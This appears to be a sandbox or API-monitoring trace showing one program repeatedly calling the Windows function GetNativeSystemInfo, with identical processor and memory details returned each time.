	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.586] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.587] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.587] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.587] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.587] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.587] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.587] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.587] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.587] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.587] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.588] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.588] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.588] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.588] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.588] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.588] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.588] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.589] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.590] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
